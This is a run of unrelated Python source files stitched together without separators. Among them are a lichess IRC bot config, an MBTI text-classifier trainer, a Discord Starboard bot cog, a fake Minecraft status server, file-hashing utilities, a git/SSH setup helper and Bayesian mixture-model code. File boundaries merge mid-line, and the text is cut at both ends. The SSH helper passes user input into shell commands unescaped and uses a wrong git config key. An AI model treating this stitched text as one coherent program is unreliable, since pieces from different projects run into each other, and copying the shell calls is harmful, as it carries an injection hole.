'irc.quakenet.org' # Port number (as an inteher! e.g. 6667) PORT = 6667 # Channel (e.g. '#mychannel') CHANNEL = '#chesstest' # Nickname of the bot NICKNAME = 'dasdasbas' # A list of lichess usernames to monitor. E.g. ['lichess_username1', 'lichess_username2',] PLAYERS = ['cocostarc', 'TheNoobyOne'] # 3600 seconds = 1h, 1800s=30min, 900s=15min, 300s=5min # The delay between requests for checking if any user in PLAYERS is currently playing. GET_PLAYING_DELAY = 300 # Delay in seconds # How long to wait until posting info again about a user whose info was posted. 
GET_PLAYER_DELAY = 3600 # Delay in seconds M-k-03/PythonATTD # file:features/steps/awsS3Step.py # ---------------------------------------------------------------------------- # STEPS: # ---------------------------------------------------------------------------- from behave import given, when, then # from hamcrest import assert_that, equal_to from blender import Blender @when('Download files from S3') def step_when_switch_blender_on(context): # context.blender.downloadfile_to_s3() print("Downloaded Files from S3") @when('Upload files to S3') def step_when_switch_blender_on(context): # context.blender.uploadfile_to_s3() print("Uploaded Files to S3") @when('Bucket is Created') def step_when_switch_blender_on(context): # context.blender.createbucket_in_s3() print("Bucket Created")1-10 from __future__ import print_function, division, absolute_import version="0.6.1" from .treeanc import TreeAnc from .treetime import TreeTime, plot_vs_years from .clock_tree import ClockTree from .treetime import ttconf as treetime_conf from .gtr import GTR from .merger_models import Coalescent from .treeregression import TreeRegression from .argument_parser import make_parser nickdelgrosso/dvc import logging from ..utils import parse_target from . import locked logger = logging.getLogger(__name__) @locked def remove(self, target, dvc_only=False): from ..dvcfile import Dvcfile, is_valid_filename path, name = parse_target(target) stages = self.get_stages(path, name) for stage in stages: stage.remove_outs(force=True) if path and is_valid_filename(path) and not dvc_only: Dvcfile(self, path).remove() return stages mbti/train.py import os import argparse import timeit import numpy as np import data_process import tensorflow as tf from tensorflow import keras DEFAULT_EPOCHS = 40 DEFAULT_BATCH_SIZE = 64 DEFAULT_TRAIN_FRACTION = .8 DEFAULT_EVAL_FRACTION = .2 DEFAULT_EMBEDDING_DIM = 300 MODEL_FILE_NAME_TEMPLATE = 'model_seq_{}_epoch_{}_embedding_{}_{}.h5' def train_category(category, train_x, train_y, test_x, test_y, embedding_layers, eval_split, epoch, batch_size): start = timeit.default_timer() model = keras.Sequential() model.add(embedding_layers) # model.add(keras.layers.GlobalAveragePooling1D()) model.add(keras.layers.Bidirectional(keras.layers.LSTM(64))) # model.add(keras.layers.Dense(16, activation=tf.nn.relu)) model.add(keras.layers.Dense(1, activation=tf.nn.sigmoid)) model.summary() model.compile(optimizer=tf.train.AdamOptimizer(), loss='binary_crossentropy', metrics=['accuracy']) history = model.fit(train_x, train_y, epochs=epoch, batch_size=batch_size, validation_split=eval_split, shuffle=True, verbose=1) results = model.evaluate(test_x, test_y) outputs = model.predict(test_x) predicted = np.round(outputs).reshape(len(outputs)).astype(int) print('MODEL: {}, outputs: {}'.format(category, outputs)) print('MODEL: {}, predicted: {}'.format(category, predicted)) end = timeit.default_timer() print('MODEL: {} is trained in {}s ({}s per epoch), results: {}'.format( category, round(end - start), round((end - start) / epoch), results)) return model def train_by_columns(data_file, voc_file, model_dir, glove_dir, epoch, batch_size, train_split, eval_split, embedding_dim): print('training: data = {}, voc = {}, ' 'epochs = {}, batch size = {}, ' 'glove dir = {}, embedding dim = {} ---> models = {}'.format(data_file, voc_file, epoch, batch_size, glove_dir, embedding_dim, model_dir)) train_x, train_y, test_x, test_y = data_process.load_data( data_file, train_split) vocab = data_process.load_vocab(voc_file) max_seq = 
train_x.shape[1] vocab_size = len(vocab) + 1 print('training: sequence length = {}, vocabulary size = {}'.format( max_seq, vocab_size)) embedding_layers = data_process.load_embeddings( vocab, max_seq, glove_dir, embedding_dim) for i in range(0, 4): model_name = 'model_{}'.format(i) model = train_category(model_name, train_x, train_y.iloc[:, i], test_x, test_y.iloc[:, i], embedding_layers, eval_split, epoch, batch_size) model.save(os.path.join(model_dir, MODEL_FILE_NAME_TEMPLATE.format(max_seq, epoch, embedding_dim, i))) def real_main(): ap = argparse.ArgumentParser() io_group = ap.add_argument_group('input and output arguments') io_group.add_argument("-d", "--data-file", required=True, help="specify pre-processed MBTI data set file") io_group.add_argument("-v", "--voc-file", required=True, help="specify vocabulary file") io_group.add_argument("-m", "--model-dir", required=True, help="specify directory of output models") io_group.add_argument("-g", "--glove-dir", required=True, help="specify directory of Glove") ml_group = ap.add_argument_group('learning parameters') ml_group.add_argument("-ts", "--train-split", required=False, type=float, default=DEFAULT_TRAIN_FRACTION, help="specify split fraction of train set") ml_group.add_argument("-es", "--eval-split", required=False, type=float, default=DEFAULT_EVAL_FRACTION, help="specify split fraction of evaluate set in each epoch") ml_group.add_argument("-ep", "--epoch", required=False, type=int, default=DEFAULT_EPOCHS, help="specify epoch count") ml_group.add_argument("-bs", "--batch-size", required=False, type=int, default=DEFAULT_BATCH_SIZE, help="specify batch size in each epoch") ml_group.add_argument("-ed", "--embedding-dim", required=False, type=int, choices=[50, 100, 200, 300], default=DEFAULT_EMBEDDING_DIM, help="specify embedding dimension") args = ap.parse_args() if not os.path.isdir(args.model_dir): os.mkdir(args.model_dir) train_by_columns(args.data_file, args.voc_file, args.model_dir, args.glove_dir, args.epoch, args.batch_size, args.train_split, args.eval_split, args.embedding_dim) if __name__ == "__main__": real_main() problems/array-partition-i/solution.py # Sort the given array (ascending here); treating the sorted elements as consecutive pairs, the first number of each pair is the smaller element of that pair (in practice, just take every other element of the sorted array starting at index 0); finally, sum those elements. class Solution: def arrayPairSum(self, nums: [int]) -> int: return sum(sorted(nums)[::2]) #!/usr/bin/env python from distutils.core import setup __version__ = "0.1" setup(name="twisted_hang", version=__version__, description="Figure out if the main thread is hanging, and if so, what's causing it to hang.", author="", license="MIT", url="https://github.com/ggreer/twisted_hang", download_url="https://github.com/ggreer/twisted_hang.git", ) import websockets import asyncio import sys async def wss_subscribe(queue: asyncio.Queue, channel_name: list = ["ticker-xbt-aud"]): try: if len(channel_name) > 1: channel = ",".join(channel_name) else: channel = channel_name[0] WSS_URL = f"wss://websockets.independentreserve.com?subscribe={channel}" async with websockets.connect(WSS_URL) as websocket: while True: data = await websocket.recv() data = data.encode("utf-8") await queue.put(data) except Exception as error: print(error) sys.exit(1) from osziplotter.Util import get_timestamp_readable from osziplotter.modelcontroller.PlotEvents import PlotEvents from osziplotter.modelcontroller.PlotInfo import PlotInfo from PyQt5.QtWidgets import QComboBox from typing import Dict, List class PlotComboBox(QComboBox, PlotEvents): def __init__(self, *args, **kwargs) -> None: super(PlotComboBox, self).__init__(*args, 
**kwargs) self.setDisabled(True) self.addItem("No plot available") self.activated.connect(self._select_plot) self._timestamps: List[float] = [] def _select_plot(self, index: int) -> None: self.update_selected_plot(self._timestamps[index]) def update_plot(self, plots: Dict[float, PlotInfo], visible_plot: PlotInfo = None) -> None: self.clear() if visible_plot is None: self.setDisabled(True) self.addItem("No plot available") else: self.setEnabled(True) timestamps_str = [get_timestamp_readable(plot.timestamp) for plot in plots.values()] self.addItems(timestamps_str) self._timestamps = [plot.timestamp for plot in plots.values()] self.setCurrentIndex(list(plots.values()).index(visible_plot)) from django.contrib.auth.models import AbstractUser from django.contrib.auth.validators import ASCIIUsernameValidator from django.contrib.postgres.fields import CICharField from django.db import models from django.utils.translation import ugettext_lazy as _ class User(AbstractUser): username_validator = ASCIIUsernameValidator() username = CICharField( _('username'), max_length=150, unique=True, help_text=_('Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.'), validators=[username_validator], error_messages={ 'unique': _("A user with that username already exists."), }, ) email = models.EmailField(_('email address'), unique=True) class Meta: verbose_name = _('user') verbose_name_plural = _('users') db_table = 'user' roysubhankar/L2Cmodels/lenet.py import torch import torch.nn as nn class LeNet(nn.Module): def __init__(self, out_dim=10, in_channel=1, img_sz = 28): super(LeNet, self).__init__() feat_map_sz = img_sz//4 self.n_feat = 50 * feat_map_sz * feat_map_sz # !!! [Architecture design tip] !!! # The KCL has much better convergence of optimization when the BN layers are added. # MCL is robust even without BN layer. 
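# Shape note (derived from the layers defined just below): both 5x5 convolutions
# use padding=2 and stride 1, so they preserve the spatial size, while each of
# the two 2x2 max-pooling layers halves it. The flattened feature size is
# therefore 50 * (img_sz // 4)**2, which is exactly self.n_feat; e.g. for the
# default img_sz=28 this gives n_feat = 50 * 7 * 7 = 2450.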
self.conv = nn.Sequential( nn.Conv2d(in_channel, 20, 5, padding=2), nn.BatchNorm2d(20), nn.ReLU(inplace=True), nn.MaxPool2d(2, 2), nn.Conv2d(20, 50, 5, padding=2), nn.BatchNorm2d(50), nn.ReLU(inplace=True), nn.MaxPool2d(2, 2) ) self.linear = nn.Sequential( nn.Linear(self.n_feat, 500), nn.BatchNorm1d(500), nn.ReLU(inplace=True), ) self.last = nn.Linear(500, out_dim) # Subject to be replaced dependent on task def features(self, x): x = self.conv(x) x = self.linear(x.view(-1, self.n_feat)) return x def logits(self, x): x = self.last(x) return x def forward(self, x): x = self.features(x) x = self.logits(x) return x def LeNet32(out_dim): # LeNet with single-channel (grayscale) 32x32 input return LeNet(out_dim=out_dim, in_channel=1, img_sz=32) def LeNetC(out_dim): # LeNet with color input return LeNet(out_dim=out_dim, in_channel=3, img_sz=32) import os from flask_admin import Admin from .models import db, User from flask_admin.contrib.sqla import ModelView def setup_admin(app): app.secret_key = os.environ.get('FLASK_APP_KEY', 'sample key') app.config['FLASK_ADMIN_SWATCH'] = 'cerulean' admin = Admin(app, name='DB Studio', template_mode='bootstrap4') # Add your models here, for example this is how we add the User model to the admin admin.add_view(ModelView(User, db.session)) # You can duplicate that line to add new models # admin.add_view(ModelView(YourModelName, db.session))tayron1/Starboard-2 import discord from discord.ext import commands import config from app.i18n import ft_, t_ from app.utils import ms from ...classes.bot import Bot class Base(commands.Cog): "Basic information and commands" def __init__(self, bot: Bot) -> None: self.bot = bot self.about_starboard = ft_( "A Starboard is a bot that allows users of a server" ' to "vote" to "pin" a message. The main idea is this:\n' " - You set a channel as the starboard, typically called " "`#starboard`\n" " - You set an emoji for voting to pin messages, usually :star:\n" " - You set a limit (called requiredStars on this bot) that " "tells Starboard how many reactions (of the emoji you set) a " "message needs before it is sent to the starboard.\n\n" "Once a message reaches the requiredStars limit in reactions, " "Starboard will essentially copy the message and repost it in " "your starboard." 
) @commands.command(name="help", brief="Get help with Starboard") @commands.bot_has_permissions(embed_links=True) async def starboard_help( self, ctx: commands.Context, *, command=None ) -> None: """Get help with Starboard""" if command: return await ctx.send_help(command) p = ctx.prefix embed = discord.Embed( title="Staboard Help", description=t_( "**[Starboard Documentation]({0.DOCS})**\n\n" "To see a complete command list, run `{1}commands`.\n" "To see a list of disabled commands, run `{1}disabled`.\n" "To list all prefixes, run `{1}prefixes`.\n" "For a list of useful links, run `{1}links`\n\n" "If you need any help, you can join [the support server]" "({0.SUPPORT_INVITE})" ).format(config, p), color=self.bot.theme_color, ).add_field( name=t_("What is a Starboard?"), value=t_(self.about_starboard) ) await ctx.send(embed=embed) @commands.command( name="botstats", aliases=["botinfo"], brief="Shows bot statistics" ) @commands.bot_has_permissions(embed_links=True) async def botinfo(self, ctx: commands.Context) -> None: """Sends guildCount and memberCount for each cluster""" clusters = [c for _, c in self.bot.stats.items()] total_guilds = sum([c["guilds"] for c in clusters]) total_members = sum([c["members"] for c in clusters]) embed = discord.Embed( title=t_("Bot Stats"), description=t_( "guilds: **{0}**\n" "users: **{1}**\n" "clusters: **{2}**\n" "shards: **{3}**" ).format( total_guilds, total_members, len(clusters), self.bot.shard_count, ), color=self.bot.theme_color, ) await ctx.send(embed=embed) @commands.command( name="ping", aliases=["latency"], brief="Shows current clusters and shards latency", ) @commands.bot_has_permissions(embed_links=True) async def ping(self, ctx: commands.Context) -> None: """Sends the latency of the current cluster and shard.""" cluster = self.bot.cluster_name shard = self.bot.get_shard(ctx.guild.shard_id if ctx.guild else 0) embed = discord.Embed(title=t_("Pong!"), color=self.bot.theme_color) embed.add_field( name=t_("Cluster **{0}**").format(cluster), value=t_("{0} ms").format(ms(self.bot.latency)), inline=False, ) embed.add_field( name=t_("Shard **{0}**").format(shard.id), value=t_("{0} ms").format(ms(shard.latency)), inline=False, ) await ctx.send(embed=embed) @commands.command( name="links", aliases=["invite", "support"], brief="Lists important/useful links", ) @commands.bot_has_permissions(embed_links=True) async def links(self, ctx: commands.Context) -> None: """Shows important/useful links""" embed = ( discord.Embed( title=t_("Important Links"), color=self.bot.theme_color, description=t_( "**[Documentation]({0.DOCS})**\n" "**[Support Server]({0.SUPPORT_INVITE})**\n" "**[Invite Starboard]({0.BOT_INVITE})**\n" ).format(config), ) .add_field( name=t_("Support Starboard"), value=str( "**" + "\n".join(config.DONATE_LINKS) + t_("\n[Become a Patron]({0.PATREON_LINK})**").format( config ) ), ) .add_field( name=t_("Vote Links"), value=str("**" + "\n".join(config.VOTE_LINKS) + "**"), inline=False, ) .add_field( name=t_("Review Links"), value=str("**" + "\n".join(config.REVIEW_LINKS) + "**"), inline=False, ) ) await ctx.send(embed=embed) @commands.command( name="vote", aliases=["votes"], brief="View vote links and number of times you've voted", ) @commands.bot_has_permissions(embed_links=True) async def vote( self, ctx: commands.Context, user: discord.User = None ) -> None: """Shows the number of times you or another user has voted, and also lists voting links""" user = user or ctx.message.author if user.bot: await ctx.send( t_( "{0} is a bot. 
How many times do you " "think they've voted?" ).format(user) ) return sql_user = await self.bot.db.users.get(user.id) if sql_user: count = sql_user["votes"] else: count = 0 embed = ( discord.Embed( title=t_("Vote for Starboard"), color=self.bot.theme_color, description=t_("You have voted **{0}** time(s).").format(count) if user.id == ctx.message.author.id else t_("**{0}** has voted **{1}** time(s).").format( user, count ), inline=False, ) .add_field( name=t_("Vote Links"), value="**" + "\n".join(config.VOTE_LINKS) + "**", inline=False, ) .add_field( name=t_("Review Links"), value="**" + "\n".join(config.REVIEW_LINKS) + "**", inline=False, ) ) await ctx.send(embed=embed) def setup(bot: Bot) -> None: bot.add_cog(Base(bot)) #!/usr/bin/python # encoding: utf-8 from util import DEFAULT_SETTINGS from workflow import Workflow, ICON_INFO import sys class Base(object): def __init__(self): wf = Workflow(default_settings=DEFAULT_SETTINGS, update_settings={ 'github_slug': 'cleobis/alfred-cal', } ) self.wf = wf self.log = wf.logger self.args = wf.args if "-set" in self.args: # option to config.py. self.args.remove("-set") if len(self.args) > 1: self.log.error("Expected only one argument. If testing from command line, wrap arguments in double quotes.") self.args = self.args[0] if len(wf.args) > 0 else "" def execute(self): if self.wf.update_available: self.wf.add_item('New version available', 'Action this item to install the update', autocomplete='workflow:update', icon=ICON_INFO) sys.exit(self.wf.run(self.main)) def main(self, wf): pass import json import socket import uuid from threading import Thread import byte_utils class SocketServer: def __init__(self, ip, port, motd, version_text, kick_message, samples, server_icon, logger, show_hostname, player_max, player_online, protocol): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.ip = ip self.port = port self.motd = motd self.version_text = version_text self.kick_message = kick_message self.samples = samples self.server_icon = server_icon self.logger = logger self.show_hostname = show_hostname self.player_max = player_max self.player_online = player_online self.protocol = protocol def on_new_client(self, client_socket, addr): data = client_socket.recv(1024) client_ip = addr[0] fqdn = socket.getfqdn(client_ip) if self.show_hostname and client_ip != fqdn: client_ip = fqdn + "/" + client_ip try: (length, i) = byte_utils.read_varint(data, 0) (packetID, i) = byte_utils.read_varint(data, i) if packetID == 0: (version, i) = byte_utils.read_varint(data, i) (ip, i) = byte_utils.read_utf(data, i) ip = ip.replace('\x00', '').replace("\r", "\\r").replace("\t", "\\t").replace("\n", "\\n") is_using_fml = False if ip.endswith("FML"): is_using_fml = True ip = ip[:-3] (port, i) = byte_utils.read_ushort(data, i) (state, i) = byte_utils.read_varint(data, i) if state == 1: self.logger.info(("[%s:%s] Received client " + ("(using ForgeModLoader) " if is_using_fml else "") + "ping packet (%s:%s).") % (client_ip, addr[1], ip, port)) motd = {} motd["version"] = {} motd["version"]["name"] = self.version_text motd["version"]["protocol"] = self.protocol motd["players"] = {} motd["players"]["max"] = self.player_max motd["players"]["online"] = self.player_online motd["players"]["sample"] = [] for sample in self.samples: motd["players"]["sample"].append({"name": sample, "id": str(uuid.uuid4())}) motd["description"] = {"text": self.motd} if self.server_icon and len(self.server_icon) > 0: motd["favicon"] = self.server_icon self.write_response(client_socket, 
json.dumps(motd)) elif state == 2: name = "" if len(data) != i: (some_int, i) = byte_utils.read_varint(data, i) (some_int, i) = byte_utils.read_varint(data, i) (name, i) = byte_utils.read_utf(data, i) self.logger.info( ("[%s:%s] " + (name + " t" if len(name) > 0 else "T") + "ries to connect to the server " + ("(using ForgeModLoader) " if is_using_fml else "") + "(%s:%s).") % (client_ip, addr[1], ip, port)) self.write_response(client_socket, json.dumps({"text": self.kick_message})) else: self.logger.info( "[%s:%d] Tried to request a login/ping with an unknown state: %d" % (client_ip, addr[1], state)) elif packetID == 1: (long, i) = byte_utils.read_long(data, i) response = bytearray() byte_utils.write_varint(response, 9) byte_utils.write_varint(response, 1) response.extend(long.to_bytes(8, byteorder="big", signed=True)) client_socket.sendall(response) self.logger.info("[%s:%d] Responded with pong packet." % (client_ip, addr[1])) else: self.logger.warning("[%s:%d] Sent an unexpected packet: %d" % (client_ip, addr[1], packetID)) except (TypeError, IndexError): self.logger.warning("[%s:%s] Received invalid data (%s)" % (client_ip, addr[1], data)) return def write_response(self, client_socket, response): response_array = bytearray() byte_utils.write_varint(response_array, 0) byte_utils.write_utf(response_array, response) length = bytearray() byte_utils.write_varint(length, len(response_array)) client_socket.sendall(length) client_socket.sendall(response_array) def start(self): self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.sock.bind((self.ip, self.port)) self.sock.settimeout(5000) self.sock.listen(30) self.logger.info("Server started on %s:%s! Waiting for incoming connections..." % (self.ip, self.port)) while 1: (client, address) = self.sock.accept() Thread(target=self.on_new_client, daemon=True, args=(client, address,)).start() def close(self): self.sock.close() """Generic functionality related to files and I/O""" import csv import email.parser import email.policy import hashlib import os import re import zipfile from dataclasses import dataclass, field from pathlib import Path from typing import Iterable, Optional, Pattern, Sequence @dataclass class ArchiveMapping: """A mapping between an archive file name and its corresponding source filesystem path""" source_file_name: Path archive_file_name: Path @dataclass class FunctionLayerMappings: """A function and requirements layer mapping and digest container""" function_mappings: Sequence[ArchiveMapping] = field(default_factory=list) function_digest: str = None requirements_mappings: Sequence[ArchiveMapping] = field(default_factory=list) requirements_digest: str = None def format_file_size(size_in_bytes: float) -> str: """Return a string representation of the specified size as its largest 2^10 representation Examples: >>> format_file_size(2048) '2.00 KiB' >>> format_file_size(16252928.0) '15.50 MiB' Args: size_in_bytes: a size in bytes Returns: a string representation of the specified size as its largest 2^10 representation""" for unit in ('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB'): if abs(size_in_bytes) < 1024.0: return f'{size_in_bytes:.2f} {unit}' size_in_bytes /= 1024.0 return f'{size_in_bytes:.2f} YiB' def get_digest(source_file_names: Sequence[Path], block_size: int = 8192) -> Optional[str]: """Return a SHA256 hash composed from the content of all source files. 
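For files that belong to an installed distribution, the per-file hashes already listed in the PEP 376 RECORD file are fed into the digest instead of re-reading those files, and PKG-INFO metadata headers are hashed in sorted order, so the resulting digest is deterministic for a given set of inputs.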
Args: source_file_names: A sequence of source file paths Returns: A SHA256 hash composed from the content of all source files.""" # See the PEP-376 RECORD file specification: package_record_pattern = re.compile(r'\.dist-info/RECORD$') egg_information_pattern = re.compile(r'\.egg-info/PKG-INFO$') digest = hashlib.sha256() full = set(source_file_names) done = set() if not full: return None for source_file_name in sorted(full): if package_record_pattern.search(str(source_file_name)): package_parent_path = source_file_name.parent.parent with open(source_file_name, 'r', buffering=block_size) as record: reader = csv.reader(record, delimiter=',', quotechar='"', lineterminator=os.linesep) for item in reader: item_name, item_hash, _other = item[:3] source_file_name = package_parent_path / item_name if item_hash and source_file_name in full: digest.update((str(item_name) + item_hash).encode()) done.add(source_file_name) remaining = full - done for source_file_name in sorted(remaining): with open(source_file_name, 'rb', buffering=block_size) as source_file: if egg_information_pattern.search(str(source_file_name)): # Ensure deterministic field order from PKG-INFO files # See: https://www.python.org/dev/peps/pep-0314/#including-metadata-in-packages parser = email.parser.BytesHeaderParser(policy=email.policy.default) source_headers = sorted(parser.parse(source_file).items()) for header, value in source_headers: digest.update(header.encode()) digest.update(value.encode()) else: digest.update(source_file.read()) return digest.hexdigest() def get_relative_file_names(source_path: Path, exclude_patterns: Sequence[Pattern] = None) -> Iterable[Path]: """Return an unsorted iterable of files recursively beneath the source path Args: source_path: a filesystem path from which to recursively iterate all files exclude_patterns: an optional sequence of regular expressions which will be used to exclude files Returns: an unsorted iterable of files recursively beneath the source path""" exclude_patterns = exclude_patterns or [] for root, _directory_names, file_names in os.walk(source_path): for file_name in file_names: relative_file_name = Path(os.path.join(root, file_name)).relative_to(source_path) if not any([pattern.match(str(relative_file_name)) for pattern in exclude_patterns]): yield relative_file_name def write_archive(archive_file_name: Path, archive_mappings: Iterable[ArchiveMapping]) -> None: """Write a zip file archive composed of the specified archive file mappings Args: archive_file_name: a writable file archive_mappings: an iterable of mappings of filesystem file names to archive file names""" with zipfile.ZipFile(archive_file_name, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as archive: for mapping in archive_mappings: archive.write(filename=mapping.source_file_name, arcname=mapping.archive_file_name) #define the function def flow_control(k): #define a string based on the value of k if(k==0): s="the variable k = %d equals 0." %k elif(k==1): s="the variable k = %d equals 1." %k else: s="the variable k = %d does not equal 0 or 1." 
%k #now we print the s print(s) #define a main function def main(): #declare integer x=0 #try flow control for 0, 1, 2 (basically, it is testing different integers in flow_control) flow_control(x) x=1 flow_control(x) x=2 flow_control(x) #run code if __name__=="__main__": main()relex/evaluation/tacred_evaluation.py from typing import Optional import sys from collections import Counter from relex.predictors.predictor_utils import load_predictor from relex.models.model_utils import batched_predict_instances NO_RELATION = "no_relation" def score(key, prediction, verbose=False): # TODO: state source correct_by_relation = Counter() guessed_by_relation = Counter() gold_by_relation = Counter() # Loop over the data to compute a score for row in range(len(key)): gold = key[row] guess = prediction[row] if gold == NO_RELATION and guess == NO_RELATION: pass elif gold == NO_RELATION and guess != NO_RELATION: guessed_by_relation[guess] += 1 elif gold != NO_RELATION and guess == NO_RELATION: gold_by_relation[gold] += 1 elif gold != NO_RELATION and guess != NO_RELATION: guessed_by_relation[guess] += 1 gold_by_relation[gold] += 1 if gold == guess: correct_by_relation[guess] += 1 # Print verbose information if verbose: print("Per-relation statistics:") relations = gold_by_relation.keys() longest_relation = 0 for relation in sorted(relations): longest_relation = max(len(relation), longest_relation) for relation in sorted(relations): # (compute the score) correct = correct_by_relation[relation] guessed = guessed_by_relation[relation] gold = gold_by_relation[relation] prec = 1.0 if guessed > 0: prec = float(correct) / float(guessed) recall = 0.0 if gold > 0: recall = float(correct) / float(gold) f1 = 0.0 if prec + recall > 0: f1 = 2.0 * prec * recall / (prec + recall) # (print the score) sys.stdout.write(("{:<" + str(longest_relation) + "}").format(relation)) sys.stdout.write(" P: ") if prec < 0.1: sys.stdout.write(" ") if prec < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(prec)) sys.stdout.write(" R: ") if recall < 0.1: sys.stdout.write(" ") if recall < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(recall)) sys.stdout.write(" F1: ") if f1 < 0.1: sys.stdout.write(" ") if f1 < 1.0: sys.stdout.write(" ") sys.stdout.write("{:.2%}".format(f1)) sys.stdout.write(" #: %d" % gold) sys.stdout.write("\n") print("") # Print the aggregate score if verbose: print("Final Score:") prec_micro = 1.0 if sum(guessed_by_relation.values()) > 0: prec_micro = (float(sum(correct_by_relation.values())) / float(sum(guessed_by_relation.values()))) recall_micro = 0.0 if sum(gold_by_relation.values()) > 0: recall_micro = (float(sum(correct_by_relation.values())) / float(sum(gold_by_relation.values()))) f1_micro = 0.0 if prec_micro + recall_micro > 0.0: f1_micro = 2.0 * prec_micro * recall_micro / (prec_micro + recall_micro) print("Precision (micro): {:.3%}".format(prec_micro)) print(" Recall (micro): {:.3%}".format(recall_micro)) print(" F1 (micro): {:.3%}".format(f1_micro)) return prec_micro, recall_micro, f1_micro def evaluate(model_dir: str, test_file: str, archive_filename: str = "model.tar.gz", cuda_device: int = -1, predictor_name: str = "relation_classifier", weights_file: Optional[str] = None, batch_size: int = 16) -> str: predictor = load_predictor(model_dir, predictor_name, cuda_device, archive_filename, weights_file) test_instances = predictor._dataset_reader.read(test_file) # pylint: disable=protected-access test_results = batched_predict_instances(predictor, test_instances, batch_size) true_labels 
= [instance["label"].label for instance in test_instances] predicted_labels = [result["label"] for result in test_results] return score(true_labels, predicted_labels) 1-10 from person.models import POS_X, POS_Y def get_position(number): number = str(number) first = number[0] second = number[1] if first == '1' or first == '2': pos_y = POS_Y[0][1] elif first == '4' or first == '3': pos_y = POS_Y[1][1] elif first == '5' or first == '6': pos_y = POS_Y[2][1] elif first == '8' or first == '7': pos_y = POS_Y[3][1] if first == '1' or first == '4' or first == '5' or first == '8': pos_x = 175 - (int(second) - 1) * 25 elif first == '2' or first == '3' or first == '6' or first == '7': pos_x = 210 + (int(second) - 1) * 25 return pos_x, pos_y import os import click import platform def sys_info(): """Check the current operating system, return either darwin or linux or windows.""" return platform.system() def validate_path(path): """Validate a path""" return os.path.isdir(path) def error(msg): return click.secho(msg, fg='red') def warning(msg): return click.secho(msg, fg='yellow') def info(msg): return click.secho(msg, fg='blue') def success(msg): return click.secho(msg, fg='green') def git_configure(): click.echo("Configuring git globally") # backup the original one os.system('cp ~/.gitconfig ~/.gitconfig.backup') git_user_name = click.prompt('Please input your name:', type=str) git_user_mail = click.prompt('Please input your email address:', type=str) cmd_name = f'git config --global user.name "{git_user_name}"' cmd_mail = f'git config --global user.mail "{git_user_mail}"' os.system(cmd_name) os.system(cmd_mail) def copy_and_show_ssh(operating_system): # add to ssh agent # copy to clipboard # show at the console # start the ssh agent in the background os.system('eval "$(ssh-agent -s)"') os.system('ssh-add ~/.ssh/id_rsa') if operating_system == 'linux': """Install xclip for linux operating systems""" click.echo( 'We need to install xclip to copy data to the clipboard,you will be asked to enter ur password:') os.system('sudo apt-get install xclip') os.system('xclip -sel clip < ~/.ssh/id_rsa.pub') elif operating_system == 'darwin': os.system('pbcopy < ~/.ssh/id_rsa.pub') click.echo( 'Copies the contents of the id_rsa.pub file to your clipboard succeeded, if not you can also copy the ' 'contents below manually:') os.system('clear') os.system('cat ~/.ssh/id_rsa.pub') warning('Now open github.com and your github settings, paste the copied content(or contents above) to the new SSH ' 'key!') def ssh_configure(operating_system): # check installed ? if os.path.isfile('~/.ssh/id_rsa.pub'): copy_and_show_ssh(operating_system) else: # create new else click.echo("No valid ssh key found! Generating a new one: (Type enter to continue)") os.system("ssh-keygen -t rsa -b 4096 -N ''") copy_and_show_ssh(operating_system) #!/usr/bin/env python # -*- coding: utf-8 -*- """ Class of variatonal Gaussian Mixture Image models. It serves as a baseline for a hidden Potts-MRF for Bayesian unsupervised image segmentation. Author: Date: 29-11-2018 """ import numpy as np import numpy.random as rnd from numpy.linalg import inv, cholesky from scipy.misc import logsumexp from scipy.special import betaln, digamma, gammaln from scipy.spatial.distance import cdist from sklearn.cluster import KMeans from sklearn.mixture import GaussianMixture from sklearn.neighbors import KNeighborsClassifier import matplotlib.pyplot as plt from vis import plot_posteriors class VariationalMixture(object): """ Superclass of variational mixture models. 
Methods are functions common to all submixture models. """ def log_multivariate_gamma(self, n, p): """ Logarithmic multivariate gamma function. This function is necessary for expectations and partition functions of Wishart distributions. See also: https://en.wikipedia.org/wiki/Multivariate_gamma_function Parameters ---------- nu : float Degrees of freedom. p : int Dimensionality. Returns ------- Gp : float p-th order multivariate gamma function. """ # Check for appropriate degree of freedom if not n > (p-1): raise ValueError('Degrees of freedom too low for dimensionality.') # Preallocate Gp = 0 # Product from d=1 to p for d in range(1, p+1): # Gamma function of degrees of freedom and dimension Gp += gammaln((n + 1 - d)/2) return (p * (p-1) / 4)*np.log(np.pi) + Gp def multivariate_digamma(self, n, p): """ Multivariate digamma function. This function is necessary for expectations and partition functions of Wishart distributions. See also: https://en.wikipedia.org/wiki/Multivariate_gamma_function Parameters ---------- nu : float Degrees of freedom. p : int Dimensionality. Returns ------- Pp : float p-th order multivariate digamma function. """ # Check for appropriate degree of freedom if not n > (p-1): raise ValueError('Degrees of freedom too low for dimensionality.') # Preallocate Pp = 0 # Sum from d=1 to D for d in range(1, p+1): # Digamma function of degrees of freedom and dimension Pp += digamma((n + 1 - d)/2) return Pp def log_partition_Wishart(self, W, n): """ Logarithmic partition function of the Wishart distribution. To compute variational expectations, the partition of the Wishart distribution is sometimes needed. The current computation follows Appendix B, equations B.78 to B.82 from Bishop's "Pattern Recognition & Machine Learning." Parameters ---------- W : array Positive definite, symmetric precision matrix. nu : int Degrees of freedom. Returns ------- B : float Partition of Wishart distribution. """ # Extract dimensionality D, D_ = W.shape # Check for symmetric matrix if not D == D_: raise ValueError('Matrix is not symmetric.') # Check for appropriate degree of freedom if not n > D-1: raise ValueError('Degrees of freedom too low for dimensionality.') # Compute log-multivariate gamma lmG = self.log_multivariate_gamma(n, D) # Compute partition function B = (-n/2)*self.log_det(W) - (n*D/2)*np.log(2) - lmG return B def entropy_Wishart(self, W, n): """ Entropy of the Wishart distribution. To compute variational expectations, the entropy of the Wishart distribution is sometimes needed. The current computation follows Appendix B, equations B.78 to B.82 from Bishop's "Pattern Recognition & Machine Learning." Parameters ---------- W : array Positive definite, symmetric precision matrix. nu : int Degrees of freedom. Returns ------- H : float Entropy of Wishart distribution. """ # Extract dimensionality D, D_ = W.shape # Check for symmetric matrix if not D == D_: raise ValueError('Matrix is not symmetric.') # Check for appropriate degree of freedom if not n > D-1: raise 